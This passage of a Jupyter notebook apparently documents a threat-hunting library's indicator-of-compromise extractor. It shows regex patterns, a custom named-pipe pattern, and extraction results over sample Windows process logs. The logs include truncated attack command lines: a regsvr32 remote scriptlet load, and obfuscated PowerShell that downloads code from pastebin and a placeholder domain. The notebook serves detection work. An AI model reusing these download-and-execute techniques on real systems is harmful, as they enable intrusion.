       "<div style=\"margin-left:20px\"><pre>(?P&lt;root&gt;[a-z]:|\\\\\\\\[a-z0-9_.$-]+||[.]+)\n",
       "            (?P&lt;folder&gt;\\\\(?:[^\\/:*?&quot;\\&#x27;&lt;&gt;|\\r\\n]+\\\\)*)\n",
       "            (?P&lt;file&gt;[^\\\\/*?&quot;&quot;&lt;&gt;|\\r\\n ]+)</pre></div>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<b>linux_path</b>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<div style=\"margin-left:20px\"><pre>(?P&lt;root&gt;/+||[.]+)\n",
       "            (?P&lt;folder&gt;/(?:[^\\\\/:*?&lt;&gt;|\\r\\n]+/)*)\n",
       "            (?P&lt;file&gt;[^/\\0&lt;&gt;|\\r\\n ]+)</pre></div>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<b>md5_hash</b>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<div style=\"margin-left:20px\"><pre>(?:^|[^A-Fa-f0-9])(?P&lt;hash&gt;[A-Fa-f0-9]{32})(?:$|[^A-Fa-f0-9])</pre></div>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<b>sha1_hash</b>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<div style=\"margin-left:20px\"><pre>(?:^|[^A-Fa-f0-9])(?P&lt;hash&gt;[A-Fa-f0-9]{40})(?:$|[^A-Fa-f0-9])</pre></div>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<b>sha256_hash</b>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<div style=\"margin-left:20px\"><pre>(?:^|[^A-Fa-f0-9])(?P&lt;hash&gt;[A-Fa-f0-9]{64})(?:$|[^A-Fa-f0-9])</pre></div>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "from html import escape\n",
    "extractor = IoCExtract()\n",
    "\n",
    "for ioc_type, pattern in extractor.ioc_types.items():\n",
    "    esc_pattern = escape(pattern.comp_regex.pattern.strip())\n",
    "    display(HTML(f'<b>{ioc_type}</b>'))\n",
    "    display(HTML(f'<div style=\"margin-left:20px\"><pre>{esc_pattern}</pre></div>'))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "<a id='addingpatterns'></a>[Contents](#toc)\n",
    "### Adding your own pattern(s)\n",
    "Docstring:\n",
    "```\n",
    "Add an IoC type and regular expression to use to the built-in set.\n",
    "\n",
    "Parameters\n",
    "----------\n",
    "ioc_type : str\n",
    "    A unique name for the IoC type\n",
    "ioc_regex : str\n",
    "    A regular expression used to search for the type\n",
    "priority : int, optional\n",
    "    Priority of the regex match vs. other ioc_patterns. 0 is\n",
    "    the highest priority (the default is 0).\n",
    "group : str, optional\n",
    "    The regex group to match (the default is None,\n",
    "    which will match on the whole expression)\n",
    "\n",
    "Notes\n",
    "-----\n",
    "Pattern priorities.\n",
    "    If two IocType patterns match on the same substring, the matched\n",
    "    substring is assigned to the pattern/IocType with the highest\n",
    "    priority. E.g. `foo.bar.com` will match types: `dns`, `windows_path`\n",
    "    and `linux_path` but since `dns` has a higher priority, the expression\n",
    "    is assigned to the `dns` matches.\n",
    "```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 8,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:52:17.389438Z",
     "start_time": "2020-02-10T19:52:17.386441Z"
    }
   },
   "outputs": [],
   "source": [
    "import re\n",
    "rcomp = re.compile(r'(?P<pipe>\\\\\\\\\\.\\\\pipe\\\\[^\\s\\\\]+)')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 9,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:52:17.436412Z",
     "start_time": "2020-02-10T19:52:17.390438Z"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "IoCPattern(ioc_type='win_named_pipe', comp_regex=re.compile('(?P<pipe>\\\\\\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\[^\\\\s\\\\\\\\]+)', re.IGNORECASE|re.MULTILINE|re.VERBOSE), priority=0, group=None)\n"
     ]
    },
    {
     "data": {
      "text/html": [
       "<div>\n",
       "<style scoped>\n",
       "    .dataframe tbody tr th:only-of-type {\n",
       "        vertical-align: middle;\n",
       "    }\n",
       "\n",
       "    .dataframe tbody tr th {\n",
       "        vertical-align: top;\n",
       "    }\n",
       "\n",
       "    .dataframe thead th {\n",
       "        text-align: right;\n",
       "    }\n",
       "</style>\n",
       "<table border=\"1\" class=\"dataframe\">\n",
       "  <thead>\n",
       "    <tr style=\"text-align: right;\">\n",
       "      <th></th>\n",
       "      <th>IoCType</th>\n",
       "      <th>Observable</th>\n",
       "      <th>SourceIndex</th>\n",
       "      <th>Input</th>\n",
       "    </tr>\n",
       "  </thead>\n",
       "  <tbody>\n",
       "    <tr>\n",
       "      <th>25</th>\n",
       "      <td>win_named_pipe</td>\n",
       "      <td>\\\\.\\pipe\\blahtest\"</td>\n",
       "      <td>107</td>\n",
       "      <td>cmd  /c \"echo blahtest &gt; \\\\.\\pipe\\blahtest\"</td>\n",
       "    </tr>\n",
       "  </tbody>\n",
       "</table>\n",
       "</div>"
      ],
      "text/plain": [
       "           IoCType          Observable  SourceIndex  \\\n",
       "25  win_named_pipe  \\\\.\\pipe\\blahtest\"          107   \n",
       "\n",
       "                                          Input  \n",
       "25  cmd  /c \"echo blahtest > \\\\.\\pipe\\blahtest\"  "
      ]
     },
     "execution_count": 9,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "extractor.add_ioc_type(ioc_type='win_named_pipe', ioc_regex=r'(?P<pipe>\\\\\\\\\\.\\\\pipe\\\\[^\\s\\\\]+)')\n",
    "\n",
    "# Check that it added ok\n",
    "print(extractor.ioc_types['win_named_pipe'])\n",
    "\n",
    "# Use it in our data set\n",
    "ioc_extractor.extract(data=process_tree, columns=['CommandLine']).query('IoCType == \\'win_named_pipe\\'')"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "<a id='extractmethod'></a>[Contents](#toc)\n",
    "### extract() method\n",
    "```\n",
    "Parameters\n",
    "----------\n",
    "src : str, optional\n",
    "    source string in which to look for IoC patterns\n",
    "    (the default is None)\n",
    "data : pd.DataFrame, optional\n",
    "    input DataFrame from which to read source strings\n",
    "    (the default is None)\n",
    "columns : list, optional\n",
    "    The list of columns to use as source strings,\n",
    "    if the `data` parameter is used. (the default is None)\n",
    "\n",
    "Other Parameters\n",
    "----------------\n",
    "ioc_types : list, optional\n",
    "    Restrict matching to just specified types.\n",
    "    (default is all types)\n",
    "include_paths : bool, optional\n",
    "    Whether to include path matches (which can be noisy)\n",
    "    (the default is false - excludes 'windows_path'\n",
    "    and 'linux_path'). If `ioc_types` is specified\n",
    "    this parameter is ignored.\n",
    "\n",
    "Returns\n",
    "-------\n",
    "Any\n",
    "    dict of found observables (if input is a string) or\n",
    "    DataFrame of observables\n",
    "\n",
    "Notes\n",
    "-----\n",
    "Extract takes either a string or a pandas DataFrame as input.\n",
    "When using the string option as an input extract will\n",
    "return a dictionary of results.\n",
    "When using a DataFrame the results will be returned as a new\n",
    "DataFrame with the following columns:\n",
    "- IoCType: the mnemonic used to distinguish different IoC Types\n",
    "- Observable: the actual value of the observable\n",
    "- SourceIndex: the index of the row in the input DataFrame from\n",
    "which the source for the IoC observable was extracted.\n",
    "\n",
    "IoCType Pattern selection\n",
    "The default list is:  ['ipv4', 'ipv6', 'dns', 'url',\n",
    "'md5_hash', 'sha1_hash', 'sha256_hash'] plus any\n",
    "user-defined types.\n",
    "'windows_path', 'linux_path' are excluded unless `include_paths`\n",
    "is True or explicitly included in `ioc_paths`.\n",
    "```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 10,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:55:00.873506Z",
     "start_time": "2020-02-10T19:55:00.829560Z"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<div>\n",
       "<style scoped>\n",
       "    .dataframe tbody tr th:only-of-type {\n",
       "        vertical-align: middle;\n",
       "    }\n",
       "\n",
       "    .dataframe tbody tr th {\n",
       "        vertical-align: top;\n",
       "    }\n",
       "\n",
       "    .dataframe thead th {\n",
       "        text-align: right;\n",
       "    }\n",
       "</style>\n",
       "<table border=\"1\" class=\"dataframe\">\n",
       "  <thead>\n",
       "    <tr style=\"text-align: right;\">\n",
       "      <th></th>\n",
       "      <th>IoCType</th>\n",
       "      <th>Observable</th>\n",
       "      <th>SourceIndex</th>\n",
       "      <th>Input</th>\n",
       "    </tr>\n",
       "  </thead>\n",
       "  <tbody>\n",
       "    <tr>\n",
       "      <th>0</th>\n",
       "      <td>dns</td>\n",
       "      <td>microsoft.com</td>\n",
       "      <td>24</td>\n",
       "      <td>cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>1</th>\n",
       "      <td>url</td>\n",
       "      <td>http://server/file.sct</td>\n",
       "      <td>31</td>\n",
       "      <td>.\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>2</th>\n",
       "      <td>dns</td>\n",
       "      <td>server</td>\n",
       "      <td>31</td>\n",
       "      <td>.\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>3</th>\n",
       "      <td>dns</td>\n",
       "      <td>evil.ps</td>\n",
       "      <td>35</td>\n",
       "      <td>.\\powershell.exe  -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>4</th>\n",
       "      <td>url</td>\n",
       "      <td>http://somedomain/best-kitten-names-1.jpg'</td>\n",
       "      <td>37</td>\n",
       "      <td>cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>5</th>\n",
       "      <td>dns</td>\n",
       "      <td>somedomain</td>\n",
       "      <td>37</td>\n",
       "      <td>cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>6</th>\n",
       "      <td>dns</td>\n",
       "      <td>blah.ps</td>\n",
       "      <td>40</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>7</th>\n",
       "      <td>md5_hash</td>\n",
       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
       "      <td>40</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>8</th>\n",
       "      <td>dns</td>\n",
       "      <td>blah.ps</td>\n",
       "      <td>41</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>9</th>\n",
       "      <td>md5_hash</td>\n",
       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
       "      <td>41</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "  </tbody>\n",
       "</table>\n",
       "</div>"
      ],
      "text/plain": [
       "    IoCType                                  Observable  SourceIndex  \\\n",
       "0       dns                               microsoft.com           24   \n",
       "1       url                      http://server/file.sct           31   \n",
       "2       dns                                      server           31   \n",
       "3       dns                                     evil.ps           35   \n",
       "4       url  http://somedomain/best-kitten-names-1.jpg'           37   \n",
       "5       dns                                  somedomain           37   \n",
       "6       dns                                     blah.ps           40   \n",
       "7  md5_hash            aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa           40   \n",
       "8       dns                                     blah.ps           41   \n",
       "9  md5_hash            aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa           41   \n",
       "\n",
       "                                                                                                 Input  \n",
       "0  cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft...  \n",
       "1                                           .\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll  \n",
       "2                                           .\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll  \n",
       "3  .\\powershell.exe  -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"...  \n",
       "4  cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...  \n",
       "5  cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...  \n",
       "6                                        cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "7                                        cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "8                                        cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "9                                        cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  "
      ]
     },
     "execution_count": 10,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "# You can specify multiple columns\n",
    "ioc_extractor.extract(data=process_tree, columns=['NewProcessName', 'CommandLine']).head(10)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### extract_df()\n",
    "`extract_df` functions identically to `extract` with a `data` parameter.\n",
    "It may be more convenient to use this when you know that your\n",
    "input is a DataFrame"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 18,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:55:45.753909Z",
     "start_time": "2020-02-10T19:55:45.712931Z"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<div>\n",
       "<style scoped>\n",
       "    .dataframe tbody tr th:only-of-type {\n",
       "        vertical-align: middle;\n",
       "    }\n",
       "\n",
       "    .dataframe tbody tr th {\n",
       "        vertical-align: top;\n",
       "    }\n",
       "\n",
       "    .dataframe thead th {\n",
       "        text-align: right;\n",
       "    }\n",
       "</style>\n",
       "<table border=\"1\" class=\"dataframe\">\n",
       "  <thead>\n",
       "    <tr style=\"text-align: right;\">\n",
       "      <th></th>\n",
       "      <th>IoCType</th>\n",
       "      <th>Observable</th>\n",
       "      <th>SourceIndex</th>\n",
       "      <th>Input</th>\n",
       "    </tr>\n",
       "  </thead>\n",
       "  <tbody>\n",
       "    <tr>\n",
       "      <th>0</th>\n",
       "      <td>dns</td>\n",
       "      <td>microsoft.com</td>\n",
       "      <td>24</td>\n",
       "      <td>cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>1</th>\n",
       "      <td>url</td>\n",
       "      <td>http://server/file.sct</td>\n",
       "      <td>31</td>\n",
       "      <td>.\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>2</th>\n",
       "      <td>dns</td>\n",
       "      <td>server</td>\n",
       "      <td>31</td>\n",
       "      <td>.\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>3</th>\n",
       "      <td>dns</td>\n",
       "      <td>evil.ps</td>\n",
       "      <td>35</td>\n",
       "      <td>.\\powershell.exe  -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>4</th>\n",
       "      <td>url</td>\n",
       "      <td>http://somedomain/best-kitten-names-1.jpg'</td>\n",
       "      <td>37</td>\n",
       "      <td>cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>5</th>\n",
       "      <td>dns</td>\n",
       "      <td>somedomain</td>\n",
       "      <td>37</td>\n",
       "      <td>cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>6</th>\n",
       "      <td>dns</td>\n",
       "      <td>blah.ps</td>\n",
       "      <td>40</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>7</th>\n",
       "      <td>md5_hash</td>\n",
       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
       "      <td>40</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>8</th>\n",
       "      <td>dns</td>\n",
       "      <td>blah.ps</td>\n",
       "      <td>41</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>9</th>\n",
       "      <td>md5_hash</td>\n",
       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
       "      <td>41</td>\n",
       "      <td>cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa &gt;&gt; blah.ps1\"</td>\n",
       "    </tr>\n",
       "  </tbody>\n",
       "</table>\n",
       "</div>"
      ],
      "text/plain": [
       "    IoCType                                  Observable  SourceIndex  \\\n",
       "0       dns                               microsoft.com           24   \n",
       "1       url                      http://server/file.sct           31   \n",
       "2       dns                                      server           31   \n",
       "3       dns                                     evil.ps           35   \n",
       "4       url  http://somedomain/best-kitten-names-1.jpg'           37   \n",
       "5       dns                                  somedomain           37   \n",
       "6       dns                                     blah.ps           40   \n",
       "7  md5_hash            aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa           40   \n",
       "8       dns                                     blah.ps           41   \n",
       "9  md5_hash            aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa           41   \n",
       "\n",
       "                                                                                                 Input  \n",
       "0  cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft...  \n",
       "1                                           .\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll  \n",
       "2                                           .\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll  \n",
       "3  .\\powershell.exe  -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"...  \n",
       "4  cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...  \n",
       "5  cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...  \n",
       "6                                        cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "7                                        cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "8                                        cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "9                                        cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  "
      ]
     },
     "execution_count": 18,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "ioc_extractor.extract_df(process_tree, columns=['NewProcessName', 'CommandLine']).head(10)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "<a id='mergeresults'></a>[Contents](#toc)\n",
    "### SourceIndex column allows you to merge the results with the input DataFrame\n",
    "Where an input row has multiple IoC matches the output of this merge will result in duplicate rows from the input (one per IoC match). The previous index is preserved in the second column (and in the SourceIndex column).\n",
    "\n",
    "Note: you will need to set the type of the SourceIndex column. In the example below case we are matching with the default numeric index so we force the type to be numeric. In cases where you are using an index of a different dtype you will need to convert the SourceIndex (dtype=object) to match the type of your index column."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 19,
   "metadata": {
    "ExecuteTime": {
     "end_time": "2020-02-10T19:52:17.482386Z",
     "start_time": "2020-02-10T19:52:17.451403Z"
    },
    "scrolled": true
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<div>\n",
       "<style scoped>\n",
       "    .dataframe tbody tr th:only-of-type {\n",
       "        vertical-align: middle;\n",
       "    }\n",
       "\n",
       "    .dataframe tbody tr th {\n",
       "        vertical-align: top;\n",
       "    }\n",
       "\n",
       "    .dataframe thead th {\n",
       "        text-align: right;\n",
       "    }\n",
       "</style>\n",
       "<table border=\"1\" class=\"dataframe\">\n",
       "  <thead>\n",
       "    <tr style=\"text-align: right;\">\n",
       "      <th></th>\n",
       "      <th>Unnamed: 0</th>\n",
       "      <th>TenantId</th>\n",
       "      <th>Account</th>\n",
       "      <th>EventID</th>\n",
       "      <th>TimeGenerated</th>\n",
       "      <th>Computer</th>\n",
       "      <th>SubjectUserSid</th>\n",
       "      <th>SubjectUserName</th>\n",
       "      <th>SubjectDomainName</th>\n",
       "      <th>SubjectLogonId</th>\n",
       "      <th>NewProcessId</th>\n",
       "      <th>NewProcessName</th>\n",
       "      <th>TokenElevationType</th>\n",
       "      <th>ProcessId</th>\n",
       "      <th>CommandLine</th>\n",
       "      <th>ParentProcessName</th>\n",
       "      <th>TargetLogonId</th>\n",
       "      <th>SourceComputerId</th>\n",
       "      <th>TimeCreatedUtc</th>\n",
       "      <th>NodeRole</th>\n",
       "      <th>Level</th>\n",
       "      <th>ProcessId1</th>\n",
       "      <th>NewProcessId1</th>\n",
       "      <th>IoCType</th>\n",
       "      <th>Observable</th>\n",
       "      <th>SourceIndex</th>\n",
       "      <th>Input</th>\n",
       "    </tr>\n",
       "  </thead>\n",
       "  <tbody>\n",
       "    <tr>\n",
       "      <th>0</th>\n",
       "      <td>0</td>\n",
       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
       "      <td>4688</td>\n",
       "      <td>2019-01-15 05:15:15.677</td>\n",
       "      <td>MSTICAlertsWin1</td>\n",
       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
       "      <td>MSTICAdmin</td>\n",
       "      <td>MSTICAlertsWin1</td>\n",
       "      <td>0xfaac27</td>\n",
       "      <td>0x1580</td>\n",
       "      <td>C:\\Diagnostics\\UserTmp\\ftp.exe</td>\n",
       "      <td>%%1936</td>\n",
       "      <td>0xbc8</td>\n",
       "      <td>.\\ftp  -s:C:\\RECYCLER\\xxppyy.exe</td>\n",
       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
       "      <td>0x0</td>\n",
       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
       "      <td>2019-01-15 05:15:15.677</td>\n",
       "      <td>source</td>\n",
       "      <td>0</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>0</td>\n",
       "      <td>NaN</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>1</th>\n",
       "      <td>1</td>\n",
       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
       "      <td>4688</td>\n",
       "      <td>2019-01-15 05:15:16.167</td>\n",
       "      <td>MSTICAlertsWin1</td>\n",
       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
       "      <td>MSTICAdmin</td>\n",
       "      <td>MSTICAlertsWin1</td>\n",
       "      <td>0xfaac27</td>\n",
       "      <td>0x16fc</td>\n",
       "      <td>C:\\Diagnostics\\UserTmp\\reg.exe</td>\n",
       "      <td>%%1936</td>\n",
       "      <td>0xbc8</td>\n",
       "      <td>.\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !</td>\n",
       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
       "      <td>0x0</td>\n",
       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
       "      <td>2019-01-15 05:15:16.167</td>\n",
       "      <td>sibling</td>\n",
       "      <td>1</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>1</td>\n",
       "      <td>NaN</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>2</th>\n",
       "      <td>2</td>\n",
       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
       "      <td>4688</td>\n",
       "      <td>2019-01-15 05:15:16.277</td>\n",
       "      <td>MSTICAlertsWin1</td>\n",
       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
       "      <td>MSTICAdmin</td>\n",
       "      <td>MSTICAlertsWin1</td>\n",
       "      <td>0xfaac27</td>\n",
       "      <td>0x1700</td>\n",
       "      <td>C:\\Diagnostics\\UserTmp\\cmd.exe</td>\n",
       "      <td>%%1936</td>\n",
       "      <td>0xbc8</td>\n",
       "      <td>cmd  /c \"systeminfo &amp;&amp; systeminfo\"</td>\n",
       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
       "      <td>0x0</td>\n",
       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
       "      <td>2019-01-15 05:15:16.277</td>\n",
       "      <td>sibling</td>\n",
       "      <td>1</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>2</td>\n",
       "      <td>NaN</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>3</th>\n",
       "      <td>3</td>\n",
       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
       "      <td>4688</td>\n",
       "      <td>2019-01-15 05:15:16.340</td>\n",
       "      <td>MSTICAlertsWin1</td>\n",
       "      <td>S-1-5-21-996632719-2361334927-4038480536-500</td>\n",
       "      <td>MSTICAdmin</td>\n",
       "      <td>MSTICAlertsWin1</td>\n",
       "      <td>0xfaac27</td>\n",
       "      <td>0x1728</td>\n",
       "      <td>C:\\Diagnostics\\UserTmp\\rundll32.exe</td>\n",
       "      <td>%%1936</td>\n",
       "      <td>0xbc8</td>\n",
       "      <td>.\\rundll32  /C 42424.exe</td>\n",
       "      <td>C:\\Windows\\System32\\cmd.exe</td>\n",
       "      <td>0x0</td>\n",
       "      <td>46fe7078-61bb-4bed-9430-7ac01d91c273</td>\n",
       "      <td>2019-01-15 05:15:16.340</td>\n",
       "      <td>sibling</td>\n",
       "      <td>1</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>NaN</td>\n",
       "      <td>3</td>\n",
       "      <td>NaN</td>\n",
       "    </tr>\n",
       "    <tr>\n",
       "      <th>4</th>\n",
       "      <td>4</td>\n",
       "      <td>802d39e1-9d70-404d-832c-2de5e2478eda</td>\n",
       "      <td>MSTICAlertsWin1\\MSTICAdmin</td>\n",
       "      <td>4688</td>\n",
       "      <td>2019-01-15 05:15:16.400</td>\n",
       "      <td>MSTICAlertsWin1</td>\n",
